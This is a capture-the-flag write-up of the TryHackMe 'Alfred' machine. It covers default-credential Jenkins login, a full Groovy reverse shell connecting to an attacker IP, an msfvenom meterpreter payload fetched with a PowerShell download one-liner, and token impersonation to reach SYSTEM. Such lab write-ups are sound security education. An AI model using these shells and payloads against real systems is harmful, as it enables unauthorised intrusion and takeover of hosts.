Post

Alfred

Posted Updated
By Peter Soverns 3 min read

Overview

Alfred is a vulnerable machine from TryHackMe that requires some standard enumeration with abusing token impersonation. The foothold is accomplished after some enumeration of the web page after gaining access to the Jenkins portal, and the privilege escalation is done with exploiting impersonate privilege token.

Nmap Scan

sudo nmap -Pn -sS <target ip> -vvv

  • 80/tcp open http syn-ack ttl 125
  • 3389/tcp open ms-wbt-server syn-ack ttl 125
  • 8080/tcp open http-proxy syn-ack ttl 125

Basic Enumeration

Checking the website, we see this has a backend for Jetty: Jetty(9.4.z-SNAPSHOT)

Nikto scan:

Server: Microsoft-IIS/7.5

  • Jenkins Login Server, on port 8080.
    • We try good old admin:admin login.
    • It works, default/bad credentials gets us in.

Web page, we see an email, doesn’t end up being useful, but still something to note.

  • alfred@wayneenterprises.com

Wfuzz for web page directories.

Port 80:

Nothing, dead end.

Port 8080:

login, assets, logout, error, git, subversion, oops, cli

Foothold

Looking through the Jekins console, we see a lot of different potential avenues to check for a foothold.

  • We are able to find a script console, that allows you to pass groovy script to execute.
  • We can use a groovy reverse shell to gain a foothold.
1
2
3
4

String host="10.13.50.64";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We are able to get a shell back, and are user alfred\bruce.

  • We have the user.txt flag.

User

Local Enumeration

We have an unusual shell on the host, so switching to a more stable shell is usually a good choice. Meterpreter is pretty stable, so we drop a meterpreter reverse shell to make it easier to keep a connection.

  • msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.50.64 LPORT=5555 -f exe -o rev.exe
  • Download payload onto the machine: powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.50.64:8000/rev.exe','rev.exe')"
  • We also used msfconsole, running exploit/multi/handler, set your conditions.
  • We have a new shell.

Getting what privileges we have available (get privs) gives us a big list of options:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

All of these are enabled. The token we care about that is easy to abuse is the SeImpersonatePrivilege token.

Impersonate Token

  • Now we load incognito in our meterpreter shell, and we list out available tokens (list_tokens -u/-g).
  • None of the user tokens are available for this impersonation abuse.
  • Listing out the group tokens shows a large number of tokens for use.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT SERVICE\AudioEndpointBuilder
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\PcaSvc
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WdiSystemHost
NT SERVICE\Winmgmt
NT SERVICE\wuauserv

Privilege Escalation

The group BUILTIN\Administrators is the group we are definitely interested in impersonating. We use impersonate_token in our shell to escalate privileges.

  • When we use getuid, we see that we are now NT AUTHORITY\SYSTEM. However, we are not done escalating yet. We do not have permissions to do things like making an interactive shell locally (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
  • Since we cannot run shell to be able to get our root.txt, we need to migrate to another process that will allow us to have the right permissions. A process like services.exe is recommended to migrate to, list out proceses with ps.
    • migrate <pid>

After doing the migration, we can make a shell, and when we run whoami, we see that we are NT AUTHORITY\SYSTEM, and can read root.txt.

  • It is in a different location, C:\Windows\System32\config.

Root

ctf, security, hacking, exploits, web application
ctf security hacking exploits web application
This post is licensed under CC BY 4.0 by the author.